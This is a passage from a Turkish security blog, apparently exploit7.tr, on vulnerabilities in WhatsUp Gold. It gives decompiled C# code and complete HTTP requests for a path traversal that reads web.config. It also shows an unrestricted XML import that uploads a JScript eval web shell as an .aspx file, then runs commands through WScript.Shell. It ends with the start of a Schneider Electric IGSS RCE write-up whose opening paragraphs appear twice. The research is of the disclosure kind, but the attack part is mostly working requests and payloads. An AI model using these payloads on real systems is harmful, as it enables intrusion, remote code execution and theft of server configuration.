</span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> IUserService service = DependencyResolverExtensions.GetService&lt;IUserService&gt;(DependencyResolver.Current); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">int</span> num = service.GetCurrentUsersID() ?? (-<span style="color:#ae81ff">1</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">int</span> currentUsersLanguageID = service.GetCurrentUsersLanguageID(); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (name.Length == <span style="color:#ae81ff">0</span>) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">base</span>.Content(<span style="color:#e6db74">&#34;alert(&#39;No name specified&#39;);&#34;</span>, <span style="color:#e6db74">&#34;text/javascript&#34;</span>); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> name = name.Replace(<span style="color:#e6db74">&#34;..&#34;</span>, <span style="color:#e6db74">&#34;&#34;</span>); </span></span><span style="display:flex;"><span> name = name.Replace(<span style="color:#e6db74">&#34;:&#34;</span>, <span style="color:#e6db74">&#34;&#34;</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">string</span> text = <span style="color:#66d9ef">base</span>.Server.MapPath(inputBasePath + name); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (sParams.Length == <span style="color:#ae81ff">0</span>) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> sParams = <span style="color:#e6db74">&#34;{}&#34;</span>; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> Dictionary&lt;<span style="color:#66d9ef">string</span>, <span style="color:#66d9ef">string</span>&gt; dictionary = <span style="color:#66d9ef">new</span> Dictionary&lt;<span style="color:#66d9ef">string</span>, <span style="color:#66d9ef">string</span>&gt;(); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">string</span> text2 = <span style="color:#66d9ef">this</span>.LoadPluginFromFile(text, num, currentUsersLanguageID, dictionary); </span></span><span style="display:flex;"><span> text2 = text2.Replace(<span style="color:#e6db74">&#34;(nm,{})&#34;</span>, <span style="color:#e6db74">&#34;(nm,&#34;</span> + sParams + <span style="color:#e6db74">&#34;)&#34;</span>); </span></span><span style="display:flex;"><span> text2 = text2.Replace(<span style="color:#e6db74">&#34;(nm, {})&#34;</span>, <span style="color:#e6db74">&#34;(nm,&#34;</span> + sParams + <span style="color:#e6db74">&#34;)&#34;</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (text2.Length == <span style="color:#ae81ff">0</span>) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">base</span>.Content(<span style="color:#66d9ef">string</span>.Concat(<span style="color:#66d9ef">new</span> <span style="color:#66d9ef">string</span>[] { <span style="color:#e6db74">&#34;nm.AddPanel({title:&#39;&#34;</span>, title, <span style="color:#e6db74">&#34;&#39;, closable:true, html: &#39;No plugin found for &#34;</span>, name, <span style="color:#e6db74">&#34;&#39;});&#34;</span> }), <span style="color:#e6db74">&#34;text/javascript&#34;</span>); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (useStickys) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> List&lt;<span style="color:#66d9ef">object</span>&gt; appStickys = <span style="color:#66d9ef">this</span>.GetAppStickys(num, name); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (appStickys.Count &gt; <span style="color:#ae81ff">1</span>) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">string</span> text3 = name.Replace(<span style="color:#e6db74">&#34;.js&#34;</span>, <span style="color:#e6db74">&#34;&#34;</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">string</span> text4 = <span style="color:#66d9ef">new</span> JavaScriptSerializer().Serialize(appStickys); </span></span><span style="display:flex;"><span> text2 = <span style="color:#66d9ef">string</span>.Concat(<span style="color:#66d9ef">new</span> <span style="color:#66d9ef">string</span>[] { <span style="color:#e6db74">&#34;(function(nm){ nm.sticky.build(&#39;&#34;</span>, text3, <span style="color:#e6db74">&#34;&#39;, &#34;</span>, text4, <span style="color:#e6db74">&#34;); })(nm);\n&#34;</span>, text2 }); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">base</span>.Content(text2, <span style="color:#e6db74">&#34;text/javascript&#34;</span>); </span></span><span style="display:flex;"><span> } </span></span></code></pre></div><p>LoadUsingBasePath methodunda dikkat etmemiz gereken iki tane replace kismi var <code>..</code> ve <code>:</code> name parametresinden gelen verilerin icinde bu karakterler geciyorsa onlari siliyor sonra <code>~/ux/plugins/ + name</code> Server.MapPath ile path yolunu olusturuyor en son <code>LoadPluginFromFile</code> methoduna gonderiyor. name parametresini direk Server.MapPath&rsquo;e ataniyor Server.MapPath name parametresi ile gelen veriyi tam bir path&rsquo;e cevirir problem burda baslar Server.MapPath verilen veriyi tam olarak bir pathe cevirecegi icin silinen karakterler yeterli olmamaktadir.</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-csharp" data-lang="csharp"><span style="display:flex;"><span>GET /NmConsole/Session/LoadPlugin?name=%<span style="color:#ae81ff">5</span>C...%<span style="color:#ae81ff">3</span>A%<span style="color:#ae81ff">3</span>A...%<span style="color:#ae81ff">5</span>C...%<span style="color:#ae81ff">3</span>A%<span style="color:#ae81ff">3</span>A...%<span style="color:#ae81ff">5</span>C...%<span style="color:#ae81ff">3</span>A%<span style="color:#ae81ff">3</span>A...%<span style="color:#ae81ff">5</span>CNM.UI<span style="color:#960050;background-color:#1e0010">\</span>Web.config&amp;title=asd HTTP/<span style="color:#ae81ff">2</span> </span></span><span style="display:flex;"><span>Host: <span style="color:#ae81ff">192.168</span>.<span style="color:#ae81ff">110.55</span>:<span style="color:#ae81ff">4431</span> </span></span><span style="display:flex;"><span>Sec-Ch-Ua: <span style="color:#e6db74">&#34;Chromium&#34;</span>;v=<span style="color:#e6db74">&#34;123&#34;</span>, <span style="color:#e6db74">&#34;Not:A-Brand&#34;</span>;v=<span style="color:#e6db74">&#34;8&#34;</span> </span></span><span style="display:flex;"><span>Accept: application/json </span></span><span style="display:flex;"><span>Content-Type: application/json </span></span><span style="display:flex;"><span>X-Requested-With: XMLHttpRequest </span></span><span style="display:flex;"><span>Sec-Ch-Ua-Mobile: ?<span style="color:#ae81ff">0</span> </span></span><span style="display:flex;"><span>User-Agent: Mozilla/<span style="color:#ae81ff">5.0</span> (Windows NT <span style="color:#ae81ff">10.0</span>; Win64; x64) AppleWebKit/<span style="color:#ae81ff">537.36</span> (KHTML, like Gecko) Chrome/<span style="color:#ae81ff">123.0</span>.<span style="color:#ae81ff">6312.122</span> Safari/<span style="color:#ae81ff">537.36</span> </span></span><span style="display:flex;"><span>Sec-Ch-Ua-Platform: <span style="color:#e6db74">&#34;Windows&#34;</span> </span></span><span style="display:flex;"><span>Sec-Fetch-Site: same-origin </span></span><span style="display:flex;"><span>Sec-Fetch-Mode: cors </span></span><span style="display:flex;"><span>Sec-Fetch-Dest: empty </span></span><span style="display:flex;"><span>Referer: https:<span style="color:#75715e">//192.168.110.55:4431/NmConsole/</span> </span></span><span style="display:flex;"><span>Accept-Encoding: gzip, deflate, br </span></span><span style="display:flex;"><span>Accept-Language: en-US,en;q=<span style="color:#ae81ff">0.9</span> </span></span><span style="display:flex;"><span>Priority: u=<span style="color:#ae81ff">1</span>, i </span></span></code></pre></div><h3 id="call-trace-loadusingbasepath">Call Trace LoadUsingBasePath</h3> <p><code>LoadUsingBasePath</code> methodunun diger kullanildigi yerleri analiz ediyorum birden fazla kullanilan yer var, son olara <code>LoadNMScript</code> methodunu da gosterecegim</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-csharp" data-lang="csharp"><span style="display:flex;"><span>GET /NmConsole/Session/LoadNMScript?name=%<span style="color:#ae81ff">5</span>C...%<span style="color:#ae81ff">3</span>A%<span style="color:#ae81ff">3</span>A...%<span style="color:#ae81ff">5</span>C...%<span style="color:#ae81ff">3</span>A%<span style="color:#ae81ff">3</span>A...%<span style="color:#ae81ff">5</span>CNmConsole<span style="color:#960050;background-color:#1e0010">\</span>web.config&amp;title=asd HTTP/<span style="color:#ae81ff">2</span> </span></span><span style="display:flex;"><span>Host: <span style="color:#ae81ff">192.168</span>.<span style="color:#ae81ff">110.55</span>:<span style="color:#ae81ff">4431</span> </span></span><span style="display:flex;"><span>Sec-Ch-Ua: <span style="color:#e6db74">&#34;Chromium&#34;</span>;v=<span style="color:#e6db74">&#34;123&#34;</span>, <span style="color:#e6db74">&#34;Not:A-Brand&#34;</span>;v=<span style="color:#e6db74">&#34;8&#34;</span> </span></span><span style="display:flex;"><span>Accept: application/json </span></span><span style="display:flex;"><span>Content-Type: application/json </span></span><span style="display:flex;"><span>X-Requested-With: XMLHttpRequest </span></span><span style="display:flex;"><span>Sec-Ch-Ua-Mobile: ?<span style="color:#ae81ff">0</span> </span></span><span style="display:flex;"><span>User-Agent: Mozilla/<span style="color:#ae81ff">5.0</span> (Windows NT <span style="color:#ae81ff">10.0</span>; Win64; x64) AppleWebKit/<span style="color:#ae81ff">537.36</span> (KHTML, like Gecko) Chrome/<span style="color:#ae81ff">123.0</span>.<span style="color:#ae81ff">6312.122</span> Safari/<span style="color:#ae81ff">537.36</span> </span></span><span style="display:flex;"><span>Sec-Ch-Ua-Platform: <span style="color:#e6db74">&#34;Windows&#34;</span> </span></span><span style="display:flex;"><span>Sec-Fetch-Site: same-origin </span></span><span style="display:flex;"><span>Sec-Fetch-Mode: cors </span></span><span style="display:flex;"><span>Sec-Fetch-Dest: empty </span></span><span style="display:flex;"><span>Referer: https:<span style="color:#75715e">//192.168.110.55:4431/NmConsole/</span> </span></span><span style="display:flex;"><span>Accept-Encoding: gzip, deflate, br </span></span><span style="display:flex;"><span>Accept-Language: en-US,en;q=<span style="color:#ae81ff">0.9</span> </span></span><span style="display:flex;"><span>Priority: u=<span style="color:#ae81ff">1</span>, i </span></span></code></pre></div><h3 id="vuln-trace-apm">Vuln Trace (APM)</h3> <p>WhatsUp Gold&rsquo;un Application Performance Monitoring (APM) eklentisi Exchange, Sql Server, Dynamics, DNS, IIS, Active Directory gibi kritik uygulamalarin performansini izlemekte gorevlidir.</p> <ol> <li>APM eklentisinin CommunityController kontrollerine bakalim.</li> </ol> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-csharp" data-lang="csharp"><span style="display:flex;"><span><span style="color:#66d9ef">public</span> ActionResult Import(IEnumerable&lt;HttpPostedFileBase&gt; importFiles) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> ActionResult actionResult; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">try</span> </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">foreach</span> (HttpPostedFileBase httpPostedFileBase <span style="color:#66d9ef">in</span> importFiles) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (httpPostedFileBase.ContentType != <span style="color:#e6db74">&#34;text/xml&#34;</span>) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">throw</span> <span style="color:#66d9ef">new</span> Exception(<span style="color:#e6db74">&#34;File imports need to be xml content&#34;</span>); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">string</span> empty = <span style="color:#66d9ef">string</span>.Empty; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">try</span> </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> CommunityController._model.ImportProfileFromDisk(httpPostedFileBase, <span style="color:#66d9ef">this</span>._GetPublicKeyFileName(), <span style="color:#66d9ef">out</span> empty); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#66d9ef">string</span>.Compare(httpPostedFileBase.FileName, <span style="color:#e6db74">&#34;PublicKey.xml&#34;</span>, <span style="color:#66d9ef">true</span>) != <span style="color:#ae81ff">0</span>) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> httpPostedFileBase.SaveAs(Path.Combine(<span style="color:#66d9ef">base</span>.Server.MapPath(<span style="color:#e6db74">&#34;~/Content/APM/Import&#34;</span>), httpPostedFileBase.FileName)); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">catch</span> (Exception ex) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">string</span> text = ex.Message; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (ex.InnerException != <span style="color:#66d9ef">null</span> &amp;&amp; !<span style="color:#66d9ef">string</span>.IsNullOrWhiteSpace(ex.InnerException.Message)) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> text = text + Environment.NewLine + ex.InnerException.Message; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">base</span>.Content(text); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> actionResult = <span style="color:#66d9ef">base</span>.Content(<span style="color:#66d9ef">string</span>.Empty); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">catch</span> (Exception ex2) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> actionResult = <span style="color:#66d9ef">base</span>.Content(ex2.Message); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> actionResult; </span></span><span style="display:flex;"><span> } </span></span></code></pre></div><p>CommunityController&rsquo;daki <code>Import</code> methoduna bakinca bizden post <code>multipart/form-data</code> ile bir ContentType <code>text/xml</code> olan bir dosya bekliyor ve ardindan <code>ImportProfileFromDisk</code> methoduna gonderiyor orada da <code>(string.Compare(httpPostedFileBase.FileName, &quot;PublicKey.xml&quot;, true) != 0)</code> kismi bizim gonderdigimiz dosyanin isminin PublicKey.xml olup olmadigini kontrol ediyor eger dosya ismi PublicKey.xml ise 0 degeri dondurur ama degilse bir alttaki kosula gecer o kosul ise gonderdigimiz dosyanin uzantisini vs kontrol etmeden direk veriyi kayit eder. Burada veriyi gonderirken yapacagimiz tek sey gonderecegimiz xml verisinin APM yapisina uygun olmasi gerekiyor yanlis hatirlamiyorsam <code>'</code> gibi karaterlere kiziyordu.</p> <p>Buraya direk aspx shell yukleyemeyiz dedigim gibi xml yapisi APM&rsquo;ye uygun olmali bu yuzden APM&rsquo;ye uygun ayni zamanda xml yapisindaki CDATA (Character Data) icerisinde kullanacagiz. <code>&lt;script language=&quot;JScript&quot; runat=&quot;server&quot;&gt;function Page_Load(){eval(Request[&quot;p&quot;],&quot;unsafe&quot;);}&lt;/script&gt;</code> Request&rsquo;den p parametresini bekliyor ve cok yaygin olarak bilinen <code>eval</code> ile calistiriyor ornek olarak <code>?p=Response.Write('test123')</code> ile response&rsquo;a test123 yazacaktir.</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-csharp" data-lang="csharp"><span style="display:flex;"><span>POST /NmConsole/Apm/Community/Import HTTP/<span style="color:#ae81ff">2</span> </span></span><span style="display:flex;"><span>Host: <span style="color:#ae81ff">192.168</span>.<span style="color:#ae81ff">110.55</span>:<span style="color:#ae81ff">4431</span> </span></span><span style="display:flex;"><span>Content-Length: <span style="color:#ae81ff">3503</span> </span></span><span style="display:flex;"><span>Cache-Control: max-age=<span style="color:#ae81ff">0</span> </span></span><span style="display:flex;"><span>Sec-Ch-Ua: <span style="color:#e6db74">&#34;Chromium&#34;</span>;v=<span style="color:#e6db74">&#34;123&#34;</span>, <span style="color:#e6db74">&#34;Not:A-Brand&#34;</span>;v=<span style="color:#e6db74">&#34;8&#34;</span> </span></span><span style="display:flex;"><span>Sec-Ch-Ua-Mobile: ?<span style="color:#ae81ff">0</span> </span></span><span style="display:flex;"><span>Sec-Ch-Ua-Platform: <span style="color:#e6db74">&#34;Windows&#34;</span> </span></span><span style="display:flex;"><span>Upgrade-Insecure-Requests: <span style="color:#ae81ff">1</span> </span></span><span style="display:flex;"><span>Origin: <span style="color:#66d9ef">null</span> </span></span><span style="display:flex;"><span>Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycTcTButXxqGsU5GA </span></span><span style="display:flex;"><span>User-Agent: Mozilla/<span style="color:#ae81ff">5.0</span> (Windows NT <span style="color:#ae81ff">10.0</span>; Win64; x64) AppleWebKit/<span style="color:#ae81ff">537.36</span> (KHTML, like Gecko) Chrome/<span style="color:#ae81ff">123.0</span>.<span style="color:#ae81ff">6312.122</span> Safari/<span style="color:#ae81ff">537.36</span> </span></span><span style="display:flex;"><span>Accept: text/html,application/xhtml+xml,application/xml </span></span><span style="display:flex;"><span>Sec-Fetch-Site: cross-site </span></span><span style="display:flex;"><span>Sec-Fetch-Mode: navigate </span></span><span style="display:flex;"><span>Sec-Fetch-User: ?<span style="color:#ae81ff">1</span> </span></span><span style="display:flex;"><span>Sec-Fetch-Dest: document </span></span><span style="display:flex;"><span>Accept-Encoding: gzip, deflate, br </span></span><span style="display:flex;"><span>Accept-Language: en-US,en;q=<span style="color:#ae81ff">0.9</span> </span></span><span style="display:flex;"><span>Priority: u=<span style="color:#ae81ff">0</span>, i </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>------WebKitFormBoundarycTcTButXxqGsU5GA </span></span><span style="display:flex;"><span>Content-Disposition: form-data; name=<span style="color:#e6db74">&#34;importFiles&#34;</span>; filename=<span style="color:#e6db74">&#34;6.aspx&#34;</span> </span></span><span style="display:flex;"><span>Content-Type: text/xml </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>&lt;?xml version=<span style="color:#e6db74">&#34;1.0&#34;</span>?&gt; </span></span><span style="display:flex;"><span>&lt;EntityAPMApplication xmlns:xsi=<span style="color:#e6db74">&#34;http://www.w3.org/2001/XMLSchema-instance&#34;</span> xmlns:xsd=<span style="color:#e6db74">&#34;http://www.w3.org/2001/XMLSchema&#34;</span>&gt; </span></span><span style="display:flex;"><span> &lt;Name&gt;Active Directory Controller (<span style="color:#ae81ff">2003</span>)&lt;/Name&gt; </span></span><span style="display:flex;"><span> &lt;Description&gt;&lt;![CDATA[&lt;script language=<span style="color:#e6db74">&#34;JScript&#34;</span> runat=<span style="color:#e6db74">&#34;server&#34;</span>&gt;function Page_Load(){eval(Request[<span style="color:#e6db74">&#34;p&#34;</span>],<span style="color:#e6db74">&#34;unsafe&#34;</span>);}&lt;/script&gt;]]&gt;&lt;/Description&gt; </span></span><span style="display:flex;"><span> &lt;ApplicationID&gt;<span style="color:#ae81ff">1</span>&lt;/ApplicationID&gt; </span></span><span style="display:flex;"><span> &lt;ApplicationType&gt; </span></span><span style="display:flex;"><span> &lt;Name&gt;Microsoft Active Directory&lt;/Name&gt; </span></span><span style="display:flex;"><span> &lt;Description&gt;Microsoft Active Directory&lt;/Description&gt; </span></span><span style="display:flex;"><span> &lt;ApplicationTypeID&gt;<span style="color:#ae81ff">1034</span>&lt;/ApplicationTypeID&gt; </span></span><span style="display:flex;"><span> &lt;IconPath&gt;microsoftad.png&lt;/IconPath&gt; </span></span><span style="display:flex;"><span> &lt;/ApplicationType&gt; </span></span><span style="display:flex;"><span> &lt;ActionPolicyDefinitionID xsi:nil=<span style="color:#e6db74">&#34;true&#34;</span> /&gt; </span></span><span style="display:flex;"><span> &lt;Version&gt;<span style="color:#ae81ff">1.0</span>&lt;/Version&gt; </span></span><span style="display:flex;"><span> &lt;RequiredAPMVersion&gt;<span style="color:#ae81ff">1.0</span>&lt;/RequiredAPMVersion&gt; </span></span><span style="display:flex;"><span> &lt;UserDefined&gt;<span style="color:#66d9ef">false</span>&lt;/UserDefined&gt; </span></span><span style="display:flex;"><span> &lt;IsRemoved&gt;<span style="color:#66d9ef">false</span>&lt;/IsRemoved&gt; </span></span><span style="display:flex;"><span> &lt;UpgradeGUID&gt;<span style="color:#ae81ff">9e8</span>c0fb1-d89c-<span style="color:#ae81ff">42f9</span>-bc0f-deee8314d713&lt;/UpgradeGUID&gt; </span></span><span style="display:flex;"><span> &lt;StoredProfileID&gt;<span style="color:#ae81ff">1</span>&lt;/StoredProfileID&gt; </span></span><span style="display:flex;"><span> &lt;Components&gt; </span></span><span style="display:flex;"><span> &lt;EntityAPMComponent&gt; </span></span><span style="display:flex;"><span> &lt;Name&gt;LDAP Bind Rate&lt;/Name&gt; </span></span><span style="display:flex;"><span> &lt;Description&gt;Monitors the number of LDAP binds per second.&lt;/Description&gt; </span></span><span style="display:flex;"><span> &lt;ComponentID&gt;<span style="color:#ae81ff">32</span>&lt;/ComponentID&gt; </span></span><span style="display:flex;"><span> &lt;ApplicationID&gt;<span style="color:#ae81ff">1</span>&lt;/ApplicationID&gt; </span></span><span style="display:flex;"><span> &lt;ComponentType&gt; </span></span><span style="display:flex;"><span> &lt;Name&gt;WMI (Raw)&lt;/Name&gt; </span></span><span style="display:flex;"><span> &lt;Description&gt;WMI (Raw)&lt;/Description&gt; </span></span><span style="display:flex;"><span> &lt;ApplicationTypeID&gt;<span style="color:#ae81ff">513</span>&lt;/ApplicationTypeID&gt; </span></span><span style="display:flex;"><span> &lt;IconPath&gt;WMI.svg&lt;/IconPath&gt; </span></span><span style="display:flex;"><span> &lt;/ComponentType&gt; </span></span><span style="display:flex;"><span> &lt;IsRemoved&gt;<span style="color:#66d9ef">false</span>&lt;/IsRemoved&gt; </span></span><span style="display:flex;"><span> &lt;Critical&gt;<span style="color:#66d9ef">false</span>&lt;/Critical&gt; </span></span><span style="display:flex;"><span> &lt;PollFrequencyMin&gt;<span style="color:#ae81ff">5</span>&lt;/PollFrequencyMin&gt; </span></span><span style="display:flex;"><span> &lt;Category&gt;Wmi&lt;/Category&gt; </span></span><span style="display:flex;"><span> &lt;GUID&gt;<span style="color:#ae81ff">3392</span>abfe-cc36-<span style="color:#ae81ff">47e1</span>-<span style="color:#ae81ff">9</span>b53-bd1d2b9e060e&lt;/GUID&gt; </span></span><span style="display:flex;"><span> &lt;RequiredCredentialType&gt;<span style="color:#ae81ff">8</span>&lt;/RequiredCredentialType&gt; </span></span><span style="display:flex;"><span> &lt;Discoverable&gt;<span style="color:#66d9ef">false</span>&lt;/Discoverable&gt; </span></span><span style="display:flex;"><span> &lt;UpgradeGUID&gt;<span style="color:#ae81ff">41371586</span>-<span style="color:#ae81ff">6866</span>-<span style="color:#ae81ff">4</span>b4d-bca5-e90701775303&lt;/UpgradeGUID&gt; </span></span><span style="display:flex;"><span> &lt;PerformanceThresholdConfig&gt; </span></span><span style="display:flex;"><span> &lt;WarningValue&gt;<span style="color:#ae81ff">0</span>&lt;/WarningValue&gt; </span></span><span style="display:flex;"><span> &lt;WarningValueUnitOfMeasure&gt;NONE&lt;/WarningValueUnitOfMeasure&gt; </span></span><span style="display:flex;"><span> &lt;WarningComparator&gt;LESS_THAN&lt;/WarningComparator&gt; </span></span><span style="display:flex;"><span> &lt;WarningDurationEvalPeriod&gt;<span style="color:#ae81ff">10</span>&lt;/WarningDurationEvalPeriod&gt; </span></span><span style="display:flex;"><span> &lt;WarningDurationUnit&gt;MINUTES&lt;/WarningDurationUnit&gt; </span></span><span style="display:flex;"><span> &lt;DownValue&gt;<span style="color:#ae81ff">0</span>&lt;/DownValue&gt; </span></span><span style="display:flex;"><span> &lt;DownValueUnitOfMeasure&gt;NONE&lt;/DownValueUnitOfMeasure&gt; </span></span><span style="display:flex;"><span> &lt;DownComparator&gt;LESS_THAN&lt;/DownComparator&gt; </span></span><span style="display:flex;"><span> &lt;DownDurationEvalPeriod&gt;<span style="color:#ae81ff">20</span>&lt;/DownDurationEvalPeriod&gt; </span></span><span style="display:flex;"><span> &lt;DownDurationUnit&gt;MINUTES&lt;/DownDurationUnit&gt; </span></span><span style="display:flex;"><span> &lt;/PerformanceThresholdConfig&gt; </span></span><span style="display:flex;"><span> &lt;ConfigurationData&gt; </span></span><span style="display:flex;"><span> &lt;EntityNameValuePairs&gt; </span></span><span style="display:flex;"><span> &lt;Name&gt;WMI:Counter-Displayname&lt;/Name&gt; </span></span><span style="display:flex;"><span> &lt;Value&gt;NTDS <span style="color:#960050;background-color:#1e0010">\</span> LDAP Successful Binds/sec&lt;/Value&gt; </span></span><span style="display:flex;"><span> &lt;/EntityNameValuePairs&gt; </span></span><span style="display:flex;"><span> &lt;EntityNameValuePairs&gt; </span></span><span style="display:flex;"><span> &lt;Name&gt;WMI:Counter-InstanceName&lt;/Name&gt; </span></span><span style="display:flex;"><span> &lt;Value&gt;NULL&lt;/Value&gt; </span></span><span style="display:flex;"><span> &lt;/EntityNameValuePairs&gt; </span></span><span style="display:flex;"><span> &lt;EntityNameValuePairs&gt; </span></span><span style="display:flex;"><span> &lt;Name&gt;asdWMI:Counter-PropertyName&lt;/Name&gt; </span></span><span style="display:flex;"><span> &lt;Value&gt;LDAPSuccessfulBindsPersec&lt;/Value&gt; </span></span><span style="display:flex;"><span> &lt;/EntityNameValuePairs&gt; </span></span><span style="display:flex;"><span> &lt;EntityNameValuePairs&gt; </span></span><span style="display:flex;"><span> &lt;Name&gt;WMI:Counter-RelativePath&lt;/Name&gt; </span></span><span style="display:flex;"><span> &lt;Value&gt;Win32_PerfRawData_NTDS_NTDS&lt;/Value&gt; </span></span><span style="display:flex;"><span> &lt;/EntityNameValuePairs&gt; </span></span><span style="display:flex;"><span> &lt;EntityNameValuePairs&gt; </span></span><span style="display:flex;"><span> &lt;Name&gt;WMI:Counter-Timeout&lt;/Name&gt; </span></span><span style="display:flex;"><span> &lt;Value&gt;<span style="color:#ae81ff">2000</span>&lt;/Value&gt; </span></span><span style="display:flex;"><span> &lt;/EntityNameValuePairs&gt; </span></span><span style="display:flex;"><span> &lt;/ConfigurationData&gt; </span></span><span style="display:flex;"><span> &lt;/EntityAPMComponent&gt; </span></span><span style="display:flex;"><span> &lt;/Components&gt; </span></span><span style="display:flex;"><span> &lt;Groups /&gt; </span></span><span style="display:flex;"><span> &lt;Attributes /&gt; </span></span><span style="display:flex;"><span>&lt;/EntityAPMApplication&gt; </span></span><span style="display:flex;"><span>------WebKitFormBoundarycTcTButXxqGsU5GA-- </span></span></code></pre></div><h3 id="exploit7-bolumu">Exploit7 Bolumu</h3> <p><code>https://192.168.110.55:4431/NmConsole/Content/Apm/Import/6.aspx?p=new%20ActiveXObject(&quot;WScript.Shell&quot;).Exec(&quot;calc.exe&quot;)</code></p> <p><img src="https://exploit7.tr/resource/rce.gif" alt="CALC"></p> <p>Devami gelecektir&hellip; <img src="https://exploit7.tr/resource/last.png" alt="last"></p> Schneider Electric Remote Code Execution https://exploit7.tr/posts/schneider-electric-rce/ Thu, 03 Oct 2024 11:00:00 +0400 https://exploit7.tr/posts/schneider-electric-rce/ <h2 id="schneider-electric-remote-code-execution-cve-2023-3001">Schneider Electric Remote Code Execution (CVE-2023-3001)</h2> <p>Schneider Electric&rsquo;in IGSS (Intelligent Graphical Scada System) yazilimi, endustriyel otomasyon ve kontrol sistemleri icin kullanilan bir SCADA (Supervisory Control and Data Acquisition) platformudur.</p> <h3 id="schneider-electric-dashboard">Schneider Electric Dashboard</h3> <p>Ilk once IGSS&rsquo;nin kendi processine bakiyorum <code>IGSSMaster.exe</code> dnspy ile biraz baktiktan sonra diger modullerine bakiyorum <code>alarm</code>,<code>dashboard</code>,<code>job scheduler</code>,<code>maintenance</code> vs&hellip;</p> <p><img src="https://exploit7.tr/resource/igssdash.png" alt="IGSS"></p> <h3 id="dashboardexe">Dashboard.exe!</h3> <p>Bu exeyi biraz inceledigimde IGSS&rsquo;nin <code>.DASH</code> adinda proje dosyasini editleme, yeniden olusturma, varolan bir dash dosyasini acma gibi ozellikleri var. Burada dikkat ceken yerler save ve load methodlaridir;</p> <h2 id="schneider-electric-remote-code-execution-cve-2023-3001">Schneider Electric Remote Code Execution (CVE-2023-3001)</h2> <p>Schneider Electric&rsquo;in IGSS (Intelligent Graphical Scada System) yazilimi, endustriyel otomasyon ve kontrol sistemleri icin kullanilan bir SCADA (Supervisory Control and Data Acquisition) platformudur.</p> <h3 id="schneider-electric-dashboard">Schneider Electric Dashboard</h3> <p>Ilk once IGSS&rsquo;nin kendi processine bakiyorum <code>IGSSMaster.exe</code> dnspy ile biraz baktiktan sonra diger modullerine bakiyorum <code>alarm</code>,<code>dashboard</code>,<code>job scheduler</code>,<code>maintenance</code> vs&hellip;</p> <p><img src="https://exploit7.tr/resource/igssdash.png" alt="IGSS"></p> <h3 id="dashboardexe">Dashboard.exe!</h3> <p>Bu exeyi biraz inceledigimde IGSS&rsquo;nin <code>.DASH</code> adinda proje dosyasini editleme, yeniden olusturma, varolan bir dash dosyasini acma gibi ozellikleri var. Burada dikkat ceken yerler save ve load methodlaridir;</p> <h3 id="save-methodu"><code>Save</code> Methodu</h3> <p><img src="https://exploit7.tr/resource/save.png" alt="SAVE"></p> <p>Save methodu neler yapiyor, disardan aldigi name parametresi pathFromName fonksiyonu ile kontrol ediyor, pathFromName fonksiyonu da Path.GetExtension&rsquo;a soruyor Path.GetExtension&rsquo; 